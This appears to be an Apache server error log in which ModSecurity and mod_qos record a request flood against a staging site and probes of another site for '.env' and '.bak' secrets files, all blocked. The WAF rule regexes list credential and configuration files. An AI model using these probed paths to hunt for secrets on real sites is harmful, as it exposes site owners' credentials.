[Tue May 26 19:53:45.352678 2026] [security2:error] [pid 93867:tid 94154] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs75CDfrjqoHpuuBKq9gAAAV4"]
[Tue May 26 19:53:45.359033 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs70qK9k_ZUB2Vp25EcgAAAdM"]
[Tue May 26 19:53:45.371840 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EgQAAAfQ"]
[Tue May 26 19:53:45.378782 2026] [security2:error] [pid 93867:tid 94233] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8JCDfrjqoHpuuBKrBQAAAYI"]
[Tue May 26 19:53:45.379244 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs70qK9k_ZUB2Vp25EegAAAeE"]
[Tue May 26 19:53:45.379533 2026] [security2:error] [pid 86490:tid 86698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KslgAAANM"]
[Tue May 26 19:53:45.383764 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs72DRMqfxdEDkoszK4AAAAAM"]
[Tue May 26 19:53:45.386862 2026] [security2:error] [pid 86490:tid 86631] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsmAAAAJA"]
[Tue May 26 19:53:45.388818 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KskAAAAPg"]
[Tue May 26 19:53:45.391305 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs70qK9k_ZUB2Vp25EdwAAAds"]
[Tue May 26 19:53:45.416419 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EgwAAAfY"]
[Tue May 26 19:53:45.418282 2026] [security2:error] [pid 86490:tid 86658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsjgAAAKs"]
[Tue May 26 19:53:45.423564 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsmwAAAOU"]
[Tue May 26 19:53:45.428940 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8GDRMqfxdEDkoszK7gAAABA"]
[Tue May 26 19:53:45.431384 2026] [security2:error] [pid 93868:tid 94360] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EhAAAAfU"]
[Tue May 26 19:53:45.433945 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KskQAAAJY"]
[Tue May 26 19:53:45.435609 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsoAAAAOg"]
[Tue May 26 19:53:45.439518 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsnQAAAPk"]
[Tue May 26 19:53:45.441137 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EggAAAfc"]
[Tue May 26 19:53:45.444085 2026] [security2:error] [pid 93868:tid 94333] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs70qK9k_ZUB2Vp25EeAAAAdo"]
[Tue May 26 19:53:45.446798 2026] [security2:error] [pid 93868:tid 94358] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EgAAAAfM"]
[Tue May 26 19:53:45.709060 2026] [security2:error] [pid 86490:tid 86623] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/plugins/.env"] [unique_id "ahWs8VZMwN0DpLVWo6KtHAAAAIg"]
[Tue May 26 19:53:45.878483 2026] [security2:error] [pid 86490:tid 86670] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/secret.bak"] [unique_id "ahWs8VZMwN0DpLVWo6KtMwAAALc"]
[Tue May 26 19:53:46.212423 2026] [qos:error] [pid 93576:tid 93784] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs8mDRMqfxdEDkoszLBwAAAEg
[Tue May 26 19:53:46.215254 2026] [qos:error] [pid 93868:tid 94314] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs8kqK9k_ZUB2Vp25ElAAAAcc
[Tue May 26 19:53:46.217780 2026] [security2:error] [pid 86490:tid 86733] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dashboard-app/.env"] [unique_id "ahWs8lZMwN0DpLVWo6KtQwAAAPY"]
[Tue May 26 19:53:46.256910 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8mDRMqfxdEDkoszLCAAAACE
[Tue May 26 19:53:46.257342 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtSAAAAPI
[Tue May 26 19:53:46.261987 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtSQAAALk
[Tue May 26 19:53:46.262253 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8mDRMqfxdEDkoszLCQAAAF4
[Tue May 26 19:53:46.262693 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtSgAAALk
[Tue May 26 19:53:46.263018 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtSwAAAKs
[Tue May 26 19:53:46.266583 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtTAAAALU
[Tue May 26 19:53:46.267356 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtTQAAALU
[Tue May 26 19:53:46.287871 2026] [security2:error] [pid 86490:tid 86643] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsqQAAAJw"]
[Tue May 26 19:53:46.288400 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KskwAAAJg"]
[Tue May 26 19:53:46.291810 2026] [security2:error] [pid 86490:tid 86674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsqwAAALs"]
[Tue May 26 19:53:46.301048 2026] [security2:error] [pid 86490:tid 86663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsogAAALA"]
[Tue May 26 19:53:46.301089 2026] [security2:error] [pid 93867:tid 94206] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8JCDfrjqoHpuuBKrBwAAAXU"]
[Tue May 26 19:53:46.301743 2026] [security2:error] [pid 86490:tid 86676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KstgAAAL0"]
[Tue May 26 19:53:46.314409 2026] [security2:error] [pid 93868:tid 94363] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EhQAAAfg"]
[Tue May 26 19:53:46.319463 2026] [security2:error] [pid 86490:tid 86693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KslwAAAM4"]
[Tue May 26 19:53:46.323068 2026] [security2:error] [pid 86490:tid 86700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsuAAAANU"]
[Tue May 26 19:53:46.334861 2026] [security2:error] [pid 93867:tid 94239] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8JCDfrjqoHpuuBKrCAAAAYU"]
[Tue May 26 19:53:46.336705 2026] [security2:error] [pid 93867:tid 94203] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8JCDfrjqoHpuuBKrDAAAAXQ"]
[Tue May 26 19:53:46.339989 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KstQAAAMo"]
[Tue May 26 19:53:46.341715 2026] [security2:error] [pid 93868:tid 94364] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EhgAAAfk"]
[Tue May 26 19:53:46.350051 2026] [security2:error] [pid 93867:tid 94235] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8JCDfrjqoHpuuBKrBgAAAYM"]
[Tue May 26 19:53:46.351884 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EiAAAAfw"]
[Tue May 26 19:53:46.361135 2026] [security2:error] [pid 93868:tid 94369] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8EqK9k_ZUB2Vp25EigAAAf4"]
[Tue May 26 19:53:46.400467 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtAAAAAPA"]
[Tue May 26 19:53:46.400490 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6Ks-AAAAL4"]
[Tue May 26 19:53:46.400863 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KswQAAAN4"]
[Tue May 26 19:53:46.413041 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6Ks_gAAAP8"]
[Tue May 26 19:53:46.414063 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6Ks9QAAANw"]
[Tue May 26 19:53:46.424415 2026] [security2:error] [pid 93867:tid 94100] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8ZCDfrjqoHpuuBKrEQAAAUU"]
[Tue May 26 19:53:46.425948 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtCgAAAPo"]
[Tue May 26 19:53:46.436552 2026] [security2:error] [pid 93576:tid 93733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8WDRMqfxdEDkoszK-QAAABU"]
[Tue May 26 19:53:46.440407 2026] [security2:error] [pid 93576:tid 93756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8WDRMqfxdEDkoszLAAAAACw"]
[Tue May 26 19:53:46.449317 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtBgAAAM8"]
[Tue May 26 19:53:46.451525 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtDQAAANQ"]
[Tue May 26 19:53:46.453727 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8FZMwN0DpLVWo6KsvgAAAOo"]
[Tue May 26 19:53:46.464275 2026] [security2:error] [pid 86490:tid 86655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtGgAAAKg"]
[Tue May 26 19:53:46.464495 2026] [security2:error] [pid 93867:tid 94062] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8ZCDfrjqoHpuuBKrEAAAATM"]
[Tue May 26 19:53:46.464840 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8WDRMqfxdEDkoszK_AAAACI"]
[Tue May 26 19:53:46.559371 2026] [security2:error] [pid 86490:tid 86655] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/htdocs/.env"] [unique_id "ahWs8lZMwN0DpLVWo6KtlwAAAKg"]
[Tue May 26 19:53:46.596213 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs8mDRMqfxdEDkoszLHAAAACU
[Tue May 26 19:53:46.732916 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtnQAAAPw
[Tue May 26 19:53:46.741723 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtngAAAKQ
[Tue May 26 19:53:46.749641 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtnwAAAL8
[Tue May 26 19:53:46.750739 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtoAAAAL4
[Tue May 26 19:53:46.752321 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8mDRMqfxdEDkoszLHgAAABQ
[Tue May 26 19:53:46.755423 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtoQAAAN0
[Tue May 26 19:53:46.755936 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtogAAAJE
[Tue May 26 19:53:46.771684 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8mDRMqfxdEDkoszLHwAAAE0
[Tue May 26 19:53:46.773280 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtowAAAO8
